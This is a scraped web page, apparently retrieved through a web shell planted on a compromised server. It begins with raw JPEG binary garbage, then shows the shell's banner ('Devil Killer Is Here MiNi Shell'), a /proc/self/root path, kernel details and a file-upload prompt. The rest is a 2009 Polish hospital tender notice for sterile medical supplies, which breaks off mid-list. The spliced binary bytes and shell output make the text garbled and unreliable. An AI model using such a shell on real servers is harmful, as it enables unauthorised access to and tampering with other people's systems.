JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090304/45337-N-2009.html

<p class="kh_header"><b>Olsztyn: dostawę materiałów medycznych jednorazowego użytku - sterylnych</b><br>
<b>Numer ogłoszenia: 45337 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawę materiałów medycznych jednorazowego użytku - sterylnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa drobnego sprzętu medycznego jednorazowego użytku - sterylnego. Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 1 do specyfikacji.

Zamówienie będzie realizowane na zasadach i warunkach określonych w:
1)SIWZ, w tym załącznikach do SIWZ, a w szczególności projekcie umowy,
2)ofercie wybranego Wykonawcy.

Strony dopuszczają możliwość zmienności ilościowo - wartościowych  asortymentu w trakcie realizacji zamówienia pod warunkiem zachowania cen jednostkowych wynikających z umowy i nie przekroczenia ogólnej wartości umowy.

Zgodnie z art. 25 ust. 1 pkt. 2 Ustawy Prawo zamówień publicznych oraz zgodnie z § 3.1.1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2008 r. Nr Nr 188, poz. 1155) zamawiający informuje, iż w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda dostarczenia następujących oświadczeń i dokumentów oraz próbek:

1.Opis sprzętu - zamawiający wymaga załączenia właściwych stron katalogu zawierające  parametry oferowanego sprzętu.
2.Oświadczenie, że oferowany sprzęt posiada zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające, że odpowiada on określonym przepisami prawa normom (certyfikat CE, zaświadczenie  dopuszczające oferowany sprzęt do stosowania w służbie zdrowia na terenie RP, wpis lub zgłoszenie do rejestru wyrobów medycznych i inne wymagane przepisami prawa dokumenty). 
3.Do części 3, poz. 1, 2, 3,4 - próbki.
4.Do części 4, poz. 1, 2 - próbki.
5.Do części 5, poz. 1, 2, 3, 4 - próbki.
6.Do części 6, poz. 1 - próbki.
7.Do części 7: Wymagane oświadczenie o składzie chemicznym stali nierdzewnej, z której wykonane są ostrza chirurgiczne wystawione przez ich producenta oraz próbki.
8.Do części 8, poz.4, 6, 7, 9, 10 - próbki.
9.Do części 10, poz.1 - próbki..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
3.1) Nie podlegają wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Ustawy.
3.2)   spełniają warunki określone art. 22 ust. 1 pkt. 1-3 Ustawy, tzn.: 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
	c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

Sposób oceny spełniania warunków:
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń  w sposób jednoznaczny  musi wynikać, iż Wykonawca spełnia wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą  musi złożyć wymagane niżej dokumenty :
1)Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
Wykonawcy zagraniczni zamiast w/w dokumentu składają odpowiedni dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
	W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.

2)    Oświadczenie o spełnianiu warunków określonych w art. 22 oraz oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania określonych w art. 24 ustawy - wzory oświadczeń stanowią załączniki do SIWZ.
	W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty muszą być złożone przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać nieodpłatnie na wniosek wykonawcy przesłany drogą elektroniczną na adres e-mail: zamowienia@szpital.olsztyn.pl lub faksem na nr (89) 53-26-349..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego (sekretariat) bud. Administracji..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 		
Lp.	nazwa	j.m.	ilość
1	cewnik urologiczny typ Foley dwudrożny, wykonany z lateksu pokrytego warstwą silikonu, jednorazowego użytku, sterylny		
	rozmiar Ch 12	szt.	280
	rozmiar Ch 14	szt.	1500
	rozmiar Ch 16	szt.	2200
	rozmiar Ch 18	szt.	1500
	rozmiar Ch 20	szt.	700
	rozmiar Ch 22	szt.	140
	rozmiar Ch 24	szt.	10
2	cewnik urologiczny typ Foley dwudrożny, wykonany z silikonu		
	rozmiar Ch 20	szt.	20
3	cewnik urologiczny typ  Pezzer, jednorazowego użytku, sterylny		
	rozmiar Ch 12	szt.	5
	rozmiar Ch 14	szt.	5
	rozmiar Ch 18	szt.	10
	rozmiar Ch 28	szt.	10
	rozmiar Ch 34	szt.	10
4	cewnik urologiczny typ Nelaton, jednorazowego użytku, sterylny		
	rozmiar Ch 14	szt.	20
	rozmiar Ch 16	szt.	30
	rozmiar Ch 18	szt.	30
	rozmiar Ch 20	szt.	10
5	cewnik urologiczny typ Tiemann, jednorazowego użytku, sterylny		
	rozmiar Ch 10	szt.	280
	rozmiar Ch 12	szt.	350
	rozmiar Ch 14	szt.	350
	rozmiar Ch 16	szt.	350
	rozmiar Ch 18	szt.	280
	rozmiar Ch 20	szt.	150
	rozmiar Ch 22	szt.	100
6	cewnik urologiczny typ Dufour trójdrożny, wykonany z półtwardego lateksu, silikonowany, jednorazowego użytku, sterylny		
	rozmiar Ch 18	szt.	300
	rozmiar Ch 20	szt.	200
	rozmiar Ch 22	szt.	60
	rozmiar Ch 24	szt.	20
7	zatyczki schodkowe do cewników, sterylne	szt.	1300
8	cewnik do odsysania górnych dróg oddechowych, sterylny z dwoma otworami bocznymi naprzeciwległymi, z barwnymi konektorami oznaczającymi dany rozmiar		
	rozmiar Ch  8, długość  400-600	szt.	900
	rozmiar Ch 10, długość 400-600	szt.	2800
	rozmiar Ch 12, długość  500-600	szt.	800
	rozmiar Ch 14, długość  500-600	szt.	8000
	rozmiar Ch 16, długość  500-600	szt.	14000
	rozmiar Ch 18, długość  500-600	szt.	4000
	rozmiar Ch 20, długość  500-600	szt.	100
9	cewnik do odsysania górnych dróg oddechowych, wygięty do lewego oskrzela z otworem końcowym i dwoma bocznymi, rozmiar 14 F, sterylny	szt.	200
10	cewnik do karmienia z zatyczką, sterylny, pakowany prosto nie zwinięty		
	rozmiar Ch  5, długość 400-500	szt.	400
	rozmiar Ch  6, długość 400-500	szt.	7600
	rozmiar Ch  8, długość 400-500	szt.	20
	rozmiar Ch 10, długość 1000	szt.	20
11	cewnik do podawania tlenu dla dorosłych - wąsy tlenowe	szt.	4000
12	maska do podawania tlenu dla dorosłych z drenem	szt.	1300
13	maska do podawania tlenu dla dzieci z drenem	szt.	200
14	przedłużacz do podawania tlenu Ch 16, 1800-2100, sterylny	szt.	800
15	dren typ Kehr, jednorazowego użytku, sterylny		
	rozmiar Ch 10, 760 x 300	szt.	20
	rozmiar Ch 12, 760 x 300	szt.	30
	rozmiar Ch 14, 760 x 300	szt.	30
	rozmiar Ch 16, 760 x 300	szt.	10
	rozmiar Ch 18, 760 x 300	szt.	10
	rozmiar Ch 20, 760 x 300	szt.	10
	rozmiar Ch 22, 760 x 300	szt.	10
16	zgłębnik żołądkowy, sterylny		
	rozmiar Ch 12, 800-1000	szt.	10
	rozmiar Ch 14, 800-1000	szt.	160
	rozmiar Ch 16, 800-1000	szt.	600
	rozmiar Ch 18, 800-1000	szt.	580
	rozmiar Ch 20, 800-1000	szt.	250
	rozmiar Ch 22, 800-1000 	szt.	130
	rozmiar Ch 24, 800-1000	szt.	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 ( sterylne )		
Lp.	nazwa	j.m.	ilość
1	strzykawki 		
	2ml x 100 szt.	opak.	1100
	5ml x 100 szt.	opak.	740
	10ml x 100 szt.	opak.	500
	20ml x 100 szt.	opak.	900
	50ml na cewnik - janet	szt.	1500
	50ml luer - na pompę	szt.	200
	50ml luer lock - na pompę	szt.	6000
	100ml na cewnik - janet	szt.	3600
	do podawania insuliny 1ml x 100 szt.	opak.	82
	do podawania tuberkuliny 1ml z igłą nakładaną x 100 szt.	opak.	9
2	igły - opakowanie 100szt.		
	1,8 x 40	opak.	2
	1,2 x 40	opak.	2400
	1,1 x 40	opak.	20
	0,9 x 40	opak.	240
	0,8 x 40	opak.	1000
	0,7 x 30	opak.	200
	0,6 x 25	opak.	90
	0,5 x 25	opak.	280
	0,45 x 16	opak.	70
	0,33 x 13	opak.	10
	do pena 0,3 x 8 30G	opak.	40
3	aparaty do przetoczeń płynów infuzyjnych: odpowietrznik z filtrem  		
	przeciwbakteryjnym; zacisk rolowany umożliwiający precyzyjne  		
	ustawienie prędkości przepływu, komora kroplowa bez zawartości PVC	szt.	108000
4	aparaty do przetoczeń krwi, komora kroplowa bez zawartości PVC  	szt.	5000
5	kranik 3-drożny do kroplówek	szt.	3800
6	przedłużacz do pomp inf. dł. 1,2 - 1,5m;  bezbarwny	szt.	5300
7	przedłużacz bursztynowy do leków światłoczułych, dł. 1,5m	szt.	400
8	przyrząd do przetaczania płynów z pomiarem OCŻ	szt.	200
9	rampa pięciodrożna z przewodem 25cm ( nie system kraników )	szt.	200
10	filtr infuzyjny dla noworodków 0,2 mikrometra, z automatycznym odpowietrznikiem, możliwość stosowania do 96 godzin, zamknięcie luer-lock	szt.	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 ( sterylne )		
Lp.	nazwa	j.m.	ilość
1	kaniula do żył obwodowych: materiał - teflon lub poliuretan; paski kontrastujące w RTG 		
	wtopione w światło kaniuli lub znacznik widoczny w USG; ostry szlif ułatwiający wprowadzenie,  		
	dodatkowy port do wstrzyknięć		
	rozmiar 17 G (1,5 x45) - biała, przepływ 130ml / min	szt.	200
	rozmiar 18 G (1,2 x 38) - zielona, przepływ 90ml / min	szt.	8600
	rozmiar 20 G (1,0 x 32) - różowa, przepływ 57ml / min	szt.	26000
	rozmiar 22 G (0,8 x 25) - niebieska, przepływ 33ml / min	szt.	15000
	rozmiar 24 G (0,7 x 19) - żółta, przepływ 13ml / min	szt.	400
2	koreczki do kaniul luer-lock, umożliwiające użycie w sposób jałowy, z datą ważności na pojedynczej sztuce	szt.	55000
3	kaniula dotętnicza - rozmiar 20 G	szt.	700
4	kaniula bezpieczna, z automatycznym metalowym zatrzaskiem zabezpieczającym koniec igły po wyjęciu, rozmiar 17 G - 24 G	szt.	300
	poz.1, 2, 3, 4 - próbki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 ( sterylne )		
Lp.	nazwa	j.m.	ilość
1	system do dobowej zbiórki moczu o pojemności 2000ml, z drenem,	szt.	50
	zaworem spustowym obsługiwanym jedną ręką i zastawką  		
	antyrefluksyjną, w systemie zamkniętym, z malejącą skalą, tylną 		
	białą ścianą, komorą kroplową z filtrem hydrofobowym, bezigłowym		
	portem do pobierania próbek,  14-dniowy, sterylny		
2	zamknięty system do godzinowej zbiórki moczu na 14 dni, 	szt.	300
	dren dwukanałowy z odpowietrzaniem, z klamrą zaciskową, o dł. min.		
	110cm, z bezigłowym portem do pobierania próbek i spiralą antyzałamaniową na wyjściu drenu z komory pomiarowej,		
	pojemność komory pomiarowej min.500ml, worek o pojemności 		
	min. 2000ml, powinien posiadać zastawkę antyrefluksyjną, filtr		
	 hydrofobowy i poziomy zawór spustowy, sterylny.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  5		
Lp.	nazwa	j.m.	ilość
1	rękawice chirurgiczne, lateksowe, jałowe, jednorazowego użytku, 		
	pudrowane skrobią kukurydzianą, mikrochropowata powierzchnia		
	rozmiar: 6; 6,5; 7; 7,5; 8; 8,5	para	58000
2	rękawice diagnostyczne, lateksowe, jałowe, jednorazowego użytku, 		
	rozmiar: S, M, L 	para	4000
3	rękawice chirurgiczne,  nielateksowe, jałowe, jednorazowego użytku, 		
	rozmiar: 6,5; 7; 7,5; 8; 8,5	para	400
4	rękawice chirurgiczne, lateksowe, jałowe, lekko pudrowane, ginekologiczne		
	rozmiar:  6,5 (S);7,5 (M);8,5 (L) lub rozmiar: 7; 8; 9- min. 480mm	para	25
	poz.1, 2, 3,4 -  próbki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6 ( sterylne )		
Lp.	nazwa	j.m.	ilość
1	kaniula do żył obwodowych, noworodkowa, bez portu górnego, 	szt.	3600
	musi posiadać zdejmowalny dodatkowy element ułatwiający  		
	wprowadzenie do naczynia, podwójnie oczyszczone PTFE,  rozmiar 24G		
	poz.1 - próbki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7		
Lp.	nazwa	j.m.	ilość
1	ostrza chirurgiczne wymienne, wykonane z wysokiej jakości stali nierdzewnej, ostre, nie powodujące szarpania skóry, sterylne, jednorazowe, pakowane pojedynczo po 100szt. w kartoniku, nadruk nr serii i daty ważności na każdym opakowaniu jednostkowym, rysunek ostrza w skali 1:1 na opakowaniu handlowym i każdym opakowaniu jednostkowym, numer ostrza wygrawerowany bezpośrednio na ostrzu, przeznaczenie w j. polskim na opakowaniu		
	nr 10 x 100szt.	opak.	20
	nr 11 x 100szt.	opak.	50
	nr 15 x 100szt.	opak.	20
	nr 20 x 100szt.	opak.	10
	nr 21 x 100szt.	opak.	40
	nr 22 x 100szt.	opak.	10
	nr 23 x 100szt.	opak.	34
	nr 24 x 100szt.	opak.	20
	Wymagane oświadczenie o składzie chemicznym stali nierdzewnej,		
	z której wykonane są ostrza chirurgiczne wystawione przez producenta		
	oraz próbki..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część nr 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 8		
Lp.	nazwa	j.m.	ilość
1	bakteriologiczny zestaw transportowy z podłożem	szt.	3000
2	kanka do odbytu CH 30 ( 30 x 300 )	szt.	1400
3	opaska identyfikacyjna dla dorosłych	szt.	600
4	opaska identyfikacyjna dla noworodka, miękka, z zaoblonymi końcami, nie powodująca podrażnień	szt.	4400
5	przewód do cystoskopu pojedynczy	szt.	600
6	zaciskacz do pępowiny, mikrobiologicznie czysty	szt.	2600
7	przyrząd do pobierania leków z filtrem 0,45mikrometra, z zastawką zabezpieczającą lek przed wycieknięciem po rozłączeniu strzykawki, z  samodomykającym się korkiem	szt.	2400
8	worki do zbiórki moczu o pojemności 2000ml, z zatyczką,	szt.	300
9	woreczki do pobierania moczu dla niemowląt ( dla dziewczynek, dla chłopców ), sterylne, opakowanie folia - papier	szt.	2100
10	worki do dobowej zbiórki moczu o pojemności 2000ml, z odpływem,	szt.	22000
	posiadające zastawkę antyrefluksyjną, dokładność pomiaru 100ml,		
	sterylne,		
	poz.4, 6, 7, 9, 10 - próbki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część nr 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 9		
Lp.	nazwa	j.m.	ilość
1	rękawice lateksowe, medyczne, niejałowe, lekko pudrowane, z rolowanym mankietem		
	rozmiar: S, M, L a 100szt.	opak.	13000
2	rękawice winylowe, medyczne, niejałowe		
	rozmiar: S, M, L a 100szt.	opak.	250.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część nr 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 10		
Lp.	nazwa	j.m.	ilość
	Polietylenowy mieszek z uchwytem na palec lub  silikonowy owalny rezerwuar bez dodatkowego uchwytu, o pojemności 125 - 400 ml z zastawką przeciwzwrotną, o podciśnieniu początkowym poniżej 75 mm Hg 		
	Worek do autotransfuzji o pojemności 700 - 1000 ml z filtrem 40 - 200 mikronów 		
	Dren łączący z portem samouszczelniającym i ze zintegrowanym schodkowym łącznikiem Y do połączenia z drenami Redona		
	Dwa dreny typu Redon lub ze spiralnie umieszczonymi otworami  z  trokarami 		
	Wymagany alternatywnie: dwustopniowy wewnętrzny system filtracji na poziomie nie niższym niż 40 mikronów z pierwszym stopniem w postaci filtra w mieszku/rezerwuarze lub zewnętrzny 3-stopniowy system filtracji w linii do przetoczeń 150/50/10 lub 175/40/10 mikronów 		
